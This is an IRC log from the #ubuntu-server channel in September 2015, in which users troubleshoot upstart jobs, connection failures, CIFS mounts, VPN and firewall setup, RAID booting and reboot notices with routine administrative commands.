<lordievader> bastidrazor: Looks like it.
<Slyboots_> Evening
<Slyboots_> Im curious, anyone aware of a cli/ncurses based FTP client that supports multipart?
<bastidrazor> lordievader: windows isn't accepting the correct credentials.
<lordievader> bastidrazor: Perhaps the Windows Event logger can tell you why?
<bastidrazor> lordievader: it appears windows is accepting the connections
<lordievader> bastidrazor: Of course, else it cannot deny the authentication ;)
<bastidrazor> haha
<bastidrazor> lordievader: i changed my username on my windows box after the initial setup of windows 7. I had to use the original username instead of the new name.
<bastidrazor> lordievader: thanks for the hints
<lordievader> bastidrazor: No problem ;)
<bastidrazor> lordievader: the logs did not show any of this. looking in user accounts tipped me off.
<tonymke> What's the proper way to give daemon users access to ssl certs in /etc/ssl?
<vedic> Hey guys, I have been installing some packages via source and now looking to create service for it to start/stop/restart/status etc. What is the right way? Could you direct me to appropriate tutorial for learn it
<lordievader> vedic: http://upstart.ubuntu.com/cookbook/
<vedic> lordievader: Is there any beginner tutorial which I can consume in an hour or two and then use that link as reference?
<lordievader> vedic: Err, a pre-existing upstart script?
<vedic> lordievader: hmm...
<vedic> In a upstart script, how to check if a directory exists or not and if not create it and set permission and ownership
<Patrickdk> heh? the same way you would do it :)
<lordievader> vedic: It's just bash scripting ;)
<Patrickdk> no it's not
<Patrickdk> it's just dash scripting
<lordievader> Patrickdk: What is the difference between dash and bash?
<Patrickdk> bash added LOTS of extra crap to it
<Patrickdk> note: bashisms :)
<vedic> Patrickdk: In this, what is "install -d -m" http://www.postgresql.org/message-id/53D9DB7B.8070600@streethawk.com
<vedic> It should be mkdir and chmod and chown
<Patrickdk> you have heard of man right?
<Patrickdk> man install
<vedic> Patrickdk: ok, I have created upstart script and checked its syntax is ok. But when I run "sudo start myscript" I get "Start: Unknown job: myscript" .    I have placed this myscript.conf into /etc/init/
<Patrickdk> dunno what start is
<Patrickdk> or what it has to do with upstart
<Patrickdk> ah, guess it is the upstart manager, I just use service start
<lordievader> vedic: try "sudo initctl start myscript"
<vedic> lordievader: still same msg
<lordievader> vedic: Does "sudo initctl reload-configuration&&sudo initctl list|grep myscript" return anything?
<vedic> lordievader: no
<vedic> I tried this command and doesn't return any output
<lordievader> Are the right 644 root:root?
<lordievader> rights*
<vedic> lordievader: yea. -rw-r--r-- 1 root root 671 Sep 29 01:50 /etc/init/myscript
<vedic> /etc/init/myscript.conf (missed coping .conf)
<vedic> 644 and root:root
<lordievader> Hmm, could you pastebin your script?
<vedic> lordievader: http://pastebin.com/5fbYDjtD
<lordievader> Looks fine to me...
<lordievader> vedic: Does your user upstart see it? (initctl list|grep myscript)
<vedic> lordievader: no
<vedic> lordievader: Looks like I need restart of my vm?
<Patrickdk> heh?
<lordievader> Perhaps, but I've had similar problems with this. And there a restart didn't fix it. But it is worth a shot I suppose.
<Patrickdk> what is up with the pre-start before the start/stop on
<vedic> Patrickdk: Is there anything wrong in the script?
<Patrickdk> NORMALLY, dunno if required, pre-start comes after your start/stop lines
<vedic> lordievader: still same thing after restart
<vedic> lordievader, Patrickdk: Any ideas, how to solve this problem?
<lordievader> No idea, my knowledge on that particular bit is lots of trial and error.
<vedic> lordievader: Anyother standard approach than upstart you think people use
<lordievader> The old init.d approach (which is also run by upstart)?
<vedic> lordievader: It works now :).  pid file is not supported in recent versions of upstart
<vedic> I just removed that line and it works
<lordievader> Ah, good to know, thanks.
<vedic> lordievader: Now I know how to write a simple upstart script :)
<lordievader> vedic: Congratulations ;)
#ubuntu-server 2015-09-21
<jak2000> better place for start a program when server start: /etc/init  or /etc/init.d/rc.local ?
<quantic> jak2000: best would be to create a start script for it, but otherwise, /etc/rc.local
<quantic> jak2000: don't mess with /etc/init, and /etc/init.d/rc.local is just the init script that runs the contents of /etc/rc.local
<jak2000> the command is: sudo /opt/glassfish4/bin/asadmin start-domain swManzana
<trapirate> hello?
<trapirate> I have a few questions...if anyone has a moment.
<trapirate> SF design dork here...wondering what I need in order to set up a server (software that is)
<trapirate> I know how to write html,php,java, and thats about it.  Also basic database know how....
<trapirate> have the server ready
<trapirate> but not sure if I should do centOS or ubuntu
<trapirate> if anyone can help I'll give you free space.
<trapirate> free webspace if you can help me set this thing up!
<jelly> trapirate: just ask your questions, and if someone can and is willing to answer or comment, they will.  Mind the timezone gap.
<trapirate> How do I set up a web server?
<trapirate> centOS or should I ubuntu ?
<quantic> trapirate: You can find a metric ton of tutorials on that by simply googling.
<Guest51163> I know how to set the X11 server on different display's like ctrl+alt+fn
<Guest51163> but is there away to set the X11 server and client on seperate computers completely?
<quantic> Guest51163: See: X11 forwarding.
<Guest51163> I guess it is just host:0,1,2...etc or ipaddr:0,1,2...etc but will this allow me to ssh into this machine and start a GUI enviorment for any of my clients ssh into the system?
<Guest51163> Or if not what is the significants of haveing the X11 server side on a different machine then the client side?
<Guest51163> quantic you know ?
<lordievader> Good morning.
<root_____> Hello?
<root_____> Does anyone else have the really annoying issue that there Ubuntu server would just start refusing connections. I have been through ever log I could find and it says NOTHING thats helpful. Do any of you amazing people know whats up?
<root_____> Anyone talking?
<rbasak> !patience | root_____
<ubottu> root_____: Don't feel ignored and repeat your question quickly; if nobody knows your answer, nobody will answer you. While you wait, try searching https://help.ubuntu.com or http://ubuntuforums.org or http://askubuntu.com/
<root_____> What advantages does Ubuntu server have to Windows server?
<lordievader> root_____: Refusing connections for what service? And do you run a firewall?
<root_____> All servies, not firewall. I have it disabled??
<root_____> Just to explain further - I would just be working on a website via FTP and suddenly the server would just start refusing connections via FTP and apache. LAN and WAN. I have to restart the server for it to work again.
<lordievader> Ugh FTP. Lets focus on apache. Do you have physical access to a shell (or in some other way when this happens)?
<root_____> yes, thats how i manage ro restart when this happens. SSH also stops
<lordievader> root_____: At that point are the services still running?
<root_____> Yes
<lordievader> root_____: Do they still listen to their respective ports?
<root_____> Yes, looking at netstat it seems that everything is still working how they should be but no connecting. Could this be something else on the network causing the probem?
<lordievader> Unlikely.
<lordievader> Do you still have network connectivity?
<root_____> The server is still able to ping nodes inside and outside the network if thats what you mean
<lordievader> Interesting. iptables -vnl shows empty tables?
<root_____> iptables -vnl no command?
<lordievader> Err that should have been 'iptables -vnL'
<root_____> ahh
<root_____> brb
<root_____> i will be back
<root_____> _
<root_____> Did anyone suggest anything with the server that kept refusing connections?
<lordievader> Not while you were gone, could you answer my last question?
<root_____> About the Iptables?
<root_____> The tables were empty
<lordievader> Hmm, what does nmap say when you try to connect to localhost port 22 or 80?
<root_____> Nmap dosent show anything open on my IP once it goes down
<lordievader> root_____: Not even on localhost?
<root_____> Nothing
<lordievader> Wow. Does restarting sshd/httpd help?
<root_____> Could it be something 'overloading' the server? Such as A Ddos flooding the server?
<root_____> No, has to be restarted for it to start working again
<lordievader> Anything in dmesg?
<root_____> Nothing that shouldnt be there
<TJ-> Is it a bare-metal or virtualised server? if virtualised, what is the hypervisor?
<root_____> Its not virtualised, its hosted on my network
<root_____> Ive been lost on this for quite a while too, I have no idea
<lordievader> Perhaps resetting the network interface helps?
<root_____> Ill try it, one second
<TJ-> Can you pastebin /var/log/dmesg or, if using systemd-journald, "dmesg" capture
<root_____> Restarting the network interface did nothing, and getting the dmesg from the server is rather dificult since I cannot get the file from the server to a computer that I can put it on pastebin
<TJ-> root_____: No USB mass-storage to move the file with?
<alexstar> dear all
<alexstar> i want to ask for somthing
<root_____> Go ahead alexstar
<alexstar> can ubuntu make server in my company with client folder sync
<root_____> Ill gete this file in a minute and put it on pastebin
<alexstar> client folder sync , local network and website
<alexstar> any answer ???
<lordievader> alexstar: I am not entirely sure what you want.
<alexstar> i explain to you
<alexstar> i want server can make
<alexstar> export files from other computer to it
<alexstar> 2- website
<alexstar> 3- local network connected with it
<TJ-> alexstar: Does 'client folder sync'  mean 'roaming profiles' as done on Windows OS ?
<lordievader> Does/could your server have ssh access to those machines?
<root_____> So you want to copy a server and software to another computer?
<alexstar> yes
<alexstar> moment by moment
<alexstar> from all computer to server
<alexstar> backup server
<root_____> A complete copy of everything?
<alexstar> yes
<alexstar> no no
<alexstar> folder i choose it
<lordievader> alexstar: Does it have ssh access?
<alexstar> no
<lordievader> Hmm, that is too bad.
<root_____> How about FTP?
<alexstar> i dont have ubuntu server
<root_____> What server do you have?
<alexstar> but i want to install it for this
<lordievader> Don't do FTP, FTP is bad, rather use SFTP, FTPS or SCP.
<alexstar> how???
<alexstar> i dont understand anything about ubunto server but i use ubunto desktop
<root_____> What server software do you have?
<alexstar> i want to install ubuntu server 14.04.3 LTS
<root_____> But you want to backup your files before you wipe the server?
<lordievader> https://www.digitalocean.com/community/tutorials/how-to-configure-vsftpd-to-use-ssl-tls-on-an-ubuntu-vps
<alexstar> no
<alexstar> i want to install new server in my company
<lordievader> Anyhow, having an FTP(S) server is one thing, then you need to install/write something that automates a backup to it...
<alexstar> yes
<alexstar> please let me to tell what i need
<alexstar> i want to install server ( make back up from company computer to server in time - website with some information about company * joomla script * - odoo erb to human resource and projects - local network with all computer )
<alexstar> this i need
<alexstar> any answer ??
<root_____> So first of all you want to install Ubuntu-server to a computer
<lordievader> What OS do your company computers run?
<alexstar> windows 7
<alexstar> yes
<alexstar> dear all
<alexstar> ???????????
<T3DDY> Do you have a computer ready for the server OS to be installed?
<alexstar> yes
<lordievader> alexstar: I know nothing of Windows backups...
<T3DDY> lordievader: he wants to install Ubuntu-server to a computer and just move his website files over to it
<ogra_> alexstar, well, start with installling it then
<T3DDY> alexstar: Are you needing support to intall Ubuntu-server?
<lordievader> T3DDY: As I understand it, he also wants his Windows workstations to backup to it.
<ogra_> thats a subsequent step though :)
<alexstar> i install it now us and i tell evry thing i need in this step
<T3DDY> He can use SAMBA to backup his files too?
<T3DDY> alexstar: Do you just want a network file to put the files you want backed up to in?
<alexstar> yes
<T3DDY> alexstar: are you installing the ubuntu-server now?
<alexstar> wait my cd i downloaded from internet
<T3DDY> Whats the problem?
<sebastianlutter> I have problems with ubuntu server crashes each 2-4 month, and I cannot find a cause. Last log entry I am able to find was in auth.log: https://dpaste.de/njZK  What does the weird symbols mean ?(^@^@^@)  SSH hacking attempt? Fault memory? What do you think?
<lordievader> sebastianlutter: That is usually an indication of a drive failing. Could you pastebin the output of smartctl on your disks?
<sebastianlutter> lordievader, doing small test with smartctl and will paste results when finished
<sebastianlutter> small=short
<sebastianlutter> lordievader, does not show up any errors: https://dpaste.de/zeE1   sda:  https://dpaste.de/zZ2M  sdb: https://dpaste.de/06YQ
<lordievader> Yeah that looks okay.
<lordievader> !saucy
<ubottu> Ubuntu 13.10 (Saucy Salamander) was the 19th release of Ubuntu. Support ended on July 17th, 2014. See !eol, !upgrade and http://ubottu.com/y/saucy
<lordievader> sebastianlutter: Are you really running Saucy?
<sebastianlutter> yes, some version things forced me to do so
<lordievader> Ouch, you do know saucy is eol, I guess?
<sebastianlutter> lordievader, you're right, and I should upgrade it. But I want to know the reason for the crash
<lordievader> I understand. My explanation for these kind of log messages is that the kernel didn't have time to write the full log message to disk and is then interpreted as null bytes.
<sebastianlutter> lordievader, I see. Then it seems likely to me that it crashed during SSH was used/exploited/whatever. Other logs do not have this. Do you agree?
<lordievader> What makes you think ssh was exploited?
<jamespage> coreycb, hey - you might want to have a run through http://docs.openstack.org/releases/releases/liberty.html now that final dep versions have been frozen
<sebastianlutter> lordievader, The auth log was the last service that logged anything. As usual there are a lot of failed login attempt (wordlist attacks). And I have no better theory
<TJ-> sebastianlutter: is the server protected by UPS?
<coreycb> jamespage, ok will do
<sebastianlutter> TJ-, It is a root server from hetzner, so yes (https://www.hetzner.de/ot/)
<lordievader> Corellation doesn't mean causality.
<sebastianlutter> lordievader, I know, but I want to believe ;)
<sebastianlutter> Damn, no other hint what caused this. I hate this. Thanks a lot for your hints!
<T3DDY> Does anyone know of some software that would make a server a firewall server? So everything would go into this server and it would then redirect to other servers? Like a router but would stop bad packets
<dcosnet> learn iptables
<T3DDY> Ok
<ogra_> or ufw
<T3DDY> Does Fail2ban stop bad packets?
<ratrace> T3DDY: yes, implicitly through blocking an IP address as a result of an event in some log, eg. brute force detected against SSH from some IPv4
<ratrace> as for firewalls, there's UFW, but also take a look into Shorewall
<ratrace> or roll your own solution using iptables directly (as both ufw and shorewall are higher level wrappers around iptables)
<sebastianlutter> start with UFW and then look into IPTABLES to learn what UFW is doing for you
<T3DDY> Okay, thankyou
<T3DDY> What, in your opinion, is the best point to point VPN service?
<mripguru> T3DDY:  the one you run yourself?
<T3DDY> like - openvpn, pptpd??
<mripguru> oh :)
<mripguru> I typically use OpenVPN where budget is an issue
<T3DDY> Do you host it yourself?
<mripguru> at least one end of it usually
<mripguru> (if not both ends)
<T3DDY> What does it mean when it asks for the management host?
<T3DDY> (If you know)
<mripguru> T3DDY:  where are you seeing this? I'm not familiar with that prompt (though that doesn't sound like OpenVPN - since it doesn't cluster by default.)
<T3DDY> I was looking it up how to set it up and something was talking about a management interface. If I was going to setup a openvpn server, is this something that I would need to setup or is it not needed?
<T3DDY> Can I get some help setting up my openvpn server? When I try to start it, it says its autostarting and then when I check its status it says its not running??
<T3DDY> Anyone wanna just gimme the command to make a cert for my VPN??
<mripguru> T3DDY:  I usually use OpenVPN AS
<mripguru> which has a nice GUI
<mripguru> for all that sort of stuff
<mripguru> (dirt cheap too.)
<beisner> coreycb, jamespage - icehouse sru staging-->proposed pushed  (http://paste.ubuntu.com/12514525/)
<beisner> coreycb, jamespage - kilo sru staging-->proposed pushed (http://paste.ubuntu.com/12514783/)
<coreycb> beisner, thanks
<metalice> hi, im setting postfix+dovecot and while testing im getting this: ehlo: command not found
<dwoods> Hey everyone, weâre having some problems installing Openstack through MAAS & Landscape.  Anyone here that can point me in a direction and get us going again?
<gQuigs> did we actually have a policy change on OpenStack support length?   12.04's Cloud archive was supported until 3 months after 14.04 released.   Now J/K/L (for 14.04) will be supported for 18 months regardless? - https://wiki.ubuntu.com/ServerTeam/CloudArchive.
<gQuigs> The text on the page doesn't actually mention the 18 month
<teward> sarnold: WRT the CVE for nginx that you said 'ignored' on, because backporting isn't trivial, I also "Won't Fix"'d the corresponding releases on the LP bug.  Just for the record.
<jamespage> gQuigs, yeah - that was made prior to 14.04 release; all 14.04 cloud-archive pockets get 18 months of support
<gQuigs> jamespage: thanks for confirming :)
<jamespage> gQuigs, apart from 'M' which will get until the end of 14.04 for support
<jamespage> so 3 yrs
<gQuigs> righ
<shishi> nick rmc3
<shishi> whoops.
<teward> rmc3: important: the / is mandatory :)
<teward> :P
<baggar11> Anyone using openvswitch in here? Should I be bonding 2 physical nics or bridging them? Or both?
<baggar11> Wondering what the best config would be for eth0 and eth1 without vlans.
<jamespage> baggar11, if those are going to be your primary network access, i'd use straight linux bonding (no ovs)
<jamespage> baggar11, you can do it with ovs, but its tricky to get right in terms of having it manage the primary network interface so early in boot
<jamespage> not impossible but tricky
<baggar11> jamespage: I'm trying to play around with openvswitch, nothing is set in stone right now. I'm just wondering if ovs will do its thing over a bridge and/or bond.
<jamespage> baggar11, yes it will
<baggar11> it will over both?
<jamespage> yes
<jamespage> I frequently use GRE/VXLAN overlay networks via a bridged network interface
<jamespage> bonding is ok as well - loadbalancing is tricky, but active/passive is ok
<baggar11> I've got a bridge up now with ovs for eth0/eth1
<baggar11> I'll stick a guest on each and run some tests
<baggar11> jamespage: thanks
<PrudentMav> how can I create a system user and they only see and have access to /var/www/domain/public
<PrudentMav> ?
<PrudentMav> this is the first time I am bringing on a new dev for front end work and not sure how to do this as I've always done everything as root
<AvatarA> there really are a lot of ways...
<AvatarA> depends really on your specific case
<AvatarA> personally I would just chmod that www and allow that user to make changes there
<AvatarA> and just remove world permissions on whatever directories I don't want him to read
<sarnold> sshd's chroot may help out a bit, but maintaining chroots are annoying. making an apparmor profile for that user's shell may help
<AvatarA> you could also setup secure ftp for him just on that directory, if he doesn't need ssh login
<Wicaeed> Has anyone seen an error when trying to mount a remote Windows file share (Windows Server 2012R2) from Ubuntu server, "CIFS.VFS: cifs_mount failed w/return code = -95"?
<sarnold> EOPNOTSUPP 95 Operation not supported
<sarnold> Wicaeed: I could imagine that if you don't have e.g. cifs or smbfs modules loaded into the kernel that you might get those errors; check lsmod ouput?
<sarnold> Wicaeed: are there any more details in dmesg or other logs?
<Wicaeed> nah, just the error message that is spat out after I run the command
<Wicaeed> lsmod | grep cifs cifs     278756 0
<Wicaeed> smb doesn't show anything though, hm
<sarnold> dang, I liked that idea.
<Wicaeed> hehe
<Wicaeed> When I add it to my fstab I do get an additional message "CIFS VFS: server quires packet signing to be enabled in /proc/fs/cifs/SecurityFlags."
<sarnold> Wicaeed: you don't happen to have a comma in the password, do you? https://bugs.launchpad.net/ubuntu/+source/cifs-utils/+bug/1069915
<ubottu> Launchpad bug 1069915 in linux (Ubuntu) "unable to mount CIFS share with comma in password" [Undecided,Confirmed]
<sarnold> (not EOPNOTSUPP, but .. that entire section of code looks insanely brittle.)
<Wicaeed> No, I've also tested with multiple accounts
<sarnold> Wicaeed: hmm, the kernel's cifs README just suggests to echo a 1 or 2 into that file
<sarnold> Wicaeed: try echo 1 > /proc/fs/cifs/SecurityFlags and then re-try the mount
<sarnold> Wicaeed: see https://www.kernel.org/doc/readme/Documentation-filesystems-cifs-README for full details, but this file is seriously underdocumented
<Wicaeed> SOB, file share is on a Windows domain controller, which has a setting to force signing for network connections
<Wicaeed>  running Windows 2000, server-side packet signing must also be enabled. To enab
<Wicaeed> blah
<Wicaeed> oh Windows
<AvatarA> windows sharing, the great unknown :P
<AvatarA> now it works, now it doesn't
<sarnold> oh so true
<AvatarA> probably very advanced, free will!
<sarnold> and I don't think I ever got an anonymous read-only share to ever work with both win95 and winnt clients. maybe it's better now that the WFW codebase has been entirely retired, but configs that worked for one wouldn't work for the other..
#ubuntu-server 2015-09-22
<lordievader> Good morning.
<Nei> hi, I'm trying to use libvirt-LXC on my ubuntu server. according to google, there should be a fuse-mount on /proc/meminfo that fakes the actual memory available to the guest. but this doesn't happen for me. anyone ever tried this?
<blib> I've an intel box and am looking to automate the ubuntu install and update process. How can I do this?
<darius93> whats recommended to improve qcow2 performance?
<Kalimero> my server runs syslog-ng but the server fails to restart. last message in the logs is "syslog-ng[953]: syslog-ng shutting down; version='3.5.3'" any ideas how to solve this ?
<patdk-wk> maybe figure out what is going on?
<patdk-wk> that doesn't sound like a failure to restart at all
<ashd> i am trying to work out if i can boot from a software raid set up with GUID partitioned drives using grub (2) = no /boot partition - is it possible?
<ashd> that is raid 5 i was thinking about.
<TJ-> ashd: grub has modules for mdraid 5
<JanC> so depends in the raid setup
<TJ-> ==> if (level != 0 && level != 1 && level != 4 && level != 5 && level != 6 && level != 10) { grub_error (GRUB_ERR_NOT_IMPLEMENTED_YET
<patdk-wk> dmraid you mean
<ashd> patdk-wk: yes,
<ashd> TJ-:  grub having modules for mdraid 5 (which is what i was thinking) then i will test it out - i could not find this doucumented
#ubuntu-server 2015-09-23
<keithzg> Hrmm. I'm a bit surprised there's no easy way to tell what files are missing chunks due to bad sectors from a ddrescue .img and .log. Guess I was hoping to be lazy!
<sarnold> keithzg: heh, that seem slike the whole point of having a .log file :)
<sarnold> keithzg: check for strings of 512 or more zero bytes perhaps?
<keithzg> sarnold: I didn't actually run ddrescue with any fill setting, so as far as I understand it just skips bad sectors, then.
<keithzg> The suggested way seems to be to md5sum every file and then run again with filling in missing data and then md5sum *that*, which seems . . . inelegant.
<keithzg> I just naively assumed these details would be in the log file, which was indeed naive of me since ddrescue itself uses the log file as a reference (for repeated passes on failed sectors).
<keithzg> The main problem is the literally millions of files in question here, so . . . this is going to take a while. Alas!
<sarnold> and if you have md5sum executions waiting on dead blocks in files that might take even longer
<keithzg> Well, I'm running it on the image file created via ddrescue, so that *shouldn't* be a problem, unless I'm being braindead and missing something.
<keithzg> Actually yeah, when I think about it more I don't know why I'm so certain of that, heh.
<keithzg> But so far it's going through files quite quickly, there's just a huge ton of files.
<genewitch> How good is ubuntu server? Running on old Xeons, in a VM, with only 600MB of memory, it took me 2 years to finally need more memory. Started hitting swap last week, upped to 2000MB now.
<genewitch> it's my 'primary' linux machine, too.
<sarnold> hehe, I bet it reboots in a few seconds, too, thanks to caching in the host :)
<KervyN> gosh peta.. http://motherboard.vice.com/read/peta-sues-for-copyright-on-behalf-of-selfie-taking-monkey :-/
<KervyN> hi, some1 got an idea how to configure squid3 to cache by filename? I want to build a deb/rpm proxy and ignore the hostname
<T3DDY> Can HDD failure cause Ubuntu server to crash at startup?
<lordievader> Yes.
<RoyK> T3DDY: a disk failure can do most annoying this, so yes. better boot on something live and run smartctl -a /dev/whateveritsname
<T3DDY> Cool, thank you
<lordievader> +1
<Eldunar> hello. I intstalled ubuntu-server on vbox. It is working on windows host (Connection by putty). But on linux host it is not working. I can not connect to server via ssh. It says that Network is unreachable. I set the network adapters with same options. Can u help me?
<kgirthofer> i'm installing libreoffice on a cli server, it's failing out on the install of gnome-integration. I can skip that yes, I shouldn't need anything from gnome
<jrwren> KervyN: I think apt-cacher-ng does that. it keeps a list of mirrors and considers paths to them to be the same.
<Eldunar> hello. I intstalled ubuntu-server on vbox. It is working on windows host (Connection by putty). But on linux host it is not working. I can not connect to server via ssh. It says that Network is unreachable. I set the network adapters with same options. Can u help me?
<Eldunar> i have eth0 and eth1 visible. eth1 ipv4 is 192.168.56.101
<Eldunar> and i can not log in there. i allowed ssh in ufw and i am out of ideas
<bananapie> If I mount to a folder that has files in it, can I access the files or are they unreachable until I umount the folder?
<bananapie> nevermind, I found the answer
<quantic> kgirthofer: libreoffice doesn't care if its going on a headless box, it's a GUI application and has the associated dependencies.
<kgirthofer> the install script removes a few of the gui dependencies, I think I can remove them
<kgirthofer> I can't use the install script
<ParsectiX> Guys I'm using LDAP to have my user Database. How can I sync the system users also ?
<ParsectiX> My concern it's for the root/administrator user to have a fail-save mechanism to login on the server.
<jrwren> ParsectiX: my experience in this area is very dated, but afaik, there are no good solutions for this.
<ParsectiX> jrwren: thanks for the answer
<ParsectiX> I just want somehow to have my administrator password locally on each server and also I can change/sync it centrally so every machine can get the change.
<patdk-wk> no good solution to this?
<patdk-wk> I wouldn't recommend doing that at all
<patdk-wk> just sync your ssh keyfile
<jamespage> coreycb, ok to work through rc1?
<coreycb> jamespage, yep I can start today
<Guest92591> how can i now what requires systes restart when i get msg on login "1 package can be updated.
<Guest92591> 0 updates are security updates.
<Guest92591> *** System restart required ***
<Guest92591> sorry, should only put that system restart required
<Guest92591> what requires my system to be restarted ? where can i find out it ?
<Guest92591> 0 updates are security updates.
<Guest92591> *** System restart required ***
<Guest92591> damn
<Guest92591> sry, accident paste
<lordievader> Usually kernel updates.
<Guest92591> damn laptops, should disable the touchpad
<Guest92591> lordievader: but if it isnt kernel ?
<Guest92591> im gonna check ubuntu security msgs
<lordievader> There are a couple of other things that require reboots. Libc for example.
<Guest92591> but is it "required" if just normal use and nothing special than ssh running on server ?
<ogra_> udev too ... upstart/systemd  would ask for a reboot as well i think
<lordievader> Meh, required is a big word. Required to reboot if you want to run the new versions of the software, but if you don't want to reboot nothing is going to stop you.
<Guest92591> i understand that if kernel update and for example remote root exploit in kernel but just a little update that doestn do anything special should not be a cause to boot a server
<Tazmania> I am running a PPTPd server on a Ubuntu 12.04.5 LTS blade server to serve more than 1000 pptp clients.  As the number of clients grow, the ubuntu machine keeps crashing.  Any idea?
<patdk-wk> why remote exploit in kernel?
<patdk-wk> local exploit is horrible
<patdk-wk> if you run any kind of remote services, such as a webserver
<Guest92591> i run apache and ssh
<Tazmania> I have also set up a watchdog timer but it doesn't seem to help.  When the server crashes, only a hard reboot will do.
<Guest92591> apache2 with php5 and ssh
<ogra_> lordievader, well, indeed, but i think all of them switch that notification on
<ogra_> weather you listen to it is indeed up to you :)
<patdk-wk> Guest92591, so any exploit in the kernel, local, remote, or otherwise, your vaunerable to
<patdk-wk> unless you can guarrentee there is no exploit paths in your apache/php programs at all
<patdk-wk> and I have never known that to ever be the case
<Guest92591> patdk-wk: there is nothing that would be for me in ubuntu security notices for ubuntu-server 14.04 LTS and my software-config
<patdk-wk> you only run php files from ubuntu? without modifications?
<patdk-wk> you have never installed a php file outside of apt-get
<patdk-wk> you have never been vaunerable to a 0day vaunerability
<Tazmania> Is there a limit on the number of pptp clients that I can accept?
<Tazmania> on a ubuntu server
<cwillu_at_work> Tazmania, assuming nothing shows up in the logs before it crashes, I'd set up a netconsole to another machine, as the final gasps probably aren't being saved
<cwillu_at_work> (if things _do_ show up in the logs, you should pastebin your logs :p)
<teward> Tazmania: I think the max clients is limited by either a config option or your system's memory being consumed
<teward> a 'crash' is also not very useful, because it could mean it segfaulted, or your server rna out of memory, etc.
<neurotus> patdk-wk: but there's nothing in ubuntu security that would cause me a problem after last kernel reboot and apt-get upgrade
<cwillu_at_work> (neither of which should cause a hard lockup)
<teward> cwillu_at_work: except if all the swap is also consumed and something's not clearing it out
<neurotus> patdk-wk: update and kernel change and reboot
<cwillu_at_work> teward, in which case the oom killer gets involved, and the oom killer definitely will scream into the logs
<teward> mhm
<cwillu_at_work> (and if you've disabled it, well, stop hitting yourself :p)
<neurotus> patdk-wk: no security notices for apache or php
<teward> cwillu_at_work: oom-killer once hard-froze a Hardy system when it started killing things, so ehh
<cwillu_at_work> [citation needed]; lots of things get confused for "hard froze"
<Tazmania> what is oom-killer?
<cwillu_at_work> Tazmania, probably not relevant, unless you have a log file that says otherwise :p
<lordievader> Out of memory killer.
<Tazmania> ok
<Tazmania> thanks
<cwillu_at_work> (have you looked at /var/log/kern.log after a crash?)
<lordievader> To prevent OOM you usually have a bit of swap.
<cwillu_at_work> erm
<patdk-wk> neurotus, you seem to be confused
<cwillu_at_work> you usually have a bit of swap so that you don't have to keep idle memory in physical ram
<patdk-wk> what does a security notice have to do with apache or php?
<Tazmania> MemTotal is 16GB and SwapTotal is also 16GB
<patdk-wk> they can both be security free, and working as intented, and still allow people to run whatever they wish
<cwillu_at_work> Tazmania, as I said, probably not relevant unless you've seen something in a log that suggests this is the problem
<patdk-wk> I mean, you told it to run a php file
<patdk-wk> if that php file allows you to, well, exploit the kernel
<patdk-wk> well, your rooted
<Tazmania> I am just checking the server detail and will look into the log
<patdk-wk> and if not, your just now part of a botnet
<neurotus> patdk-wk: but no kernel change after that or anything else im running
<neurotus> patdk-wk: so im confused why reboot required
<neurotus> patdk-wk: what log should i read ?
<neurotus> patdk-wk: or install some security logging app
<Tazmania> I get a lot of input/output errors from PTY failed
<neurotus> patdk-wk: i read /var/log/apt/history.log and theres nothing security related after last reboot
<neurotus> patdk-wk: i have only installed rtorrent after last boot
<neurotus> so it should not require reboot
<AvatarA> if you do an uptime -s and then pastebin that history.log I think you may find out that is not true
<neurotus> AvatarA: ive done apt-get autoremove which removed old kernel from bootlist, should that be the cause ?
<neurotus> AvatarA: a cloud-server im running
<neurotus> AvatarA: kvm virtualization
<hallyn> smb: arges: thanks guys.
<smb> hallyn, yw
<arcsky> hi guys im trying to connect to my wireless at home. i have some issues. it works with windows. what can i do?
<krsna> arcsky: need more details..
<krsna> arcsky: is the network broadcasting SSID ?
<krsna> arcsky: going away. hope someone helps u
<zikeji> Okay I'm having a really frustrating issue getting SSL to work with dovecot :/
<arcsky> krsna: yes
<orfeo> Hello folks!
<orfeo> Could someone help me figure how to unblock a virtual server runing ubuntu-server please?
<Serus> hi
<orfeo> hi
<Serus> my friend has recently upgraded his server to ubuntu trusty
<patdk-wk> well, what is a virtual server
<Serus> but now he's getting errors when trying to upgrade
<patdk-wk> and how exactly did you block it
<tonyyarusso> orfeo: What do you mean by "unblock"?
<Serus> http://pastebin.com/Mk8jq8g3 these are the errors I'm getting
<Serus> how can I resolve this? I'm pretty sure insserv is conflicting with upstart
<orfeo> well, I did install a bunch of applications on it and now when I try to stop it running to reinstall it it won't allow me. I figure that it is because there is a process running which is somehow blocking the machine.
<tonyyarusso> "when I try to stop it" means what, and "it won't allow me" means what?
<orfeo> For example, when I try to shutdown the server via control panel I receive a message saying "An Error Occured! A process has already been instantiated for this virtual server. Please wait for the process to finish."
<tonyyarusso> What control panel?
<orfeo> the VPS control panel
<orfeo> it is a virtual server. Not local.
<tonyyarusso> What happens why you try to shut it down from within the machine itself?
<orfeo> do you mean via ssh?
<orfeo> what command should I use for that?
<Serus> Could anybody help me try to resolve my errors with insserv?
<tonyyarusso> SSH or virtual console - either way.
<tonyyarusso> shutdown....
<orfeo> Hold on, let me try it.
<orfeo> tonyyarusso: shutdown: time expected
<tonyyarusso> Yup
<tonyyarusso> Look at the man page for the syntax.
<Serus> http://pastebin.com/Mk8jq8g3 can anybody please help me with this?
<orfeo> the worst happened. I did shutdown now, lot access and the VPS control panel still blocked saying the server is runnig.
<orfeo> how weird is that?
<tonyyarusso> What arguments did you use?
<orfeo> shutdown now
<tonyyarusso> So you didn't halt it.
<orfeo> is it a problem?
<tonyyarusso> Well, that's why your server is still running.
<orfeo> Should I use a shutdown -q now ?
<tonyyarusso> -h is what you wanted
<tonyyarusso> I don't think there is a -q...
 * tarpman generally invokes poweroff(8) rather than try to remember the correct shutdown(8) incantation...
<orfeo> I thought I saw it. Well, never mind, now its too late. But thank you anyway.
<genii> I use shutdown -h now to halt, shutdown -r now to reboot
<orfeo> genii: cool, good to know. For the next time maybe.
<sarnold> Serus: do you need ppp stuff? I think first thing I'd try is apt-get purge ppp pppconfig pptpd ; if you need mdadm for raid on the system to work, leave that alone for now...
<Serus> sarnold: some guys in #ubuntu helped me, thanks anyway!
<sarnold> Serus: oh cool, what'd they do?
<TJ-> sarnold: not a lot! Turns out Serus' server release upgrade crashes part way through and it was hard-rebooted
<sarnold> TJ-: ah, thanks :D
<patdk-lap> tarpman, I do that too
<patdk-lap> but I learned on some systems, the poweroff command means just that
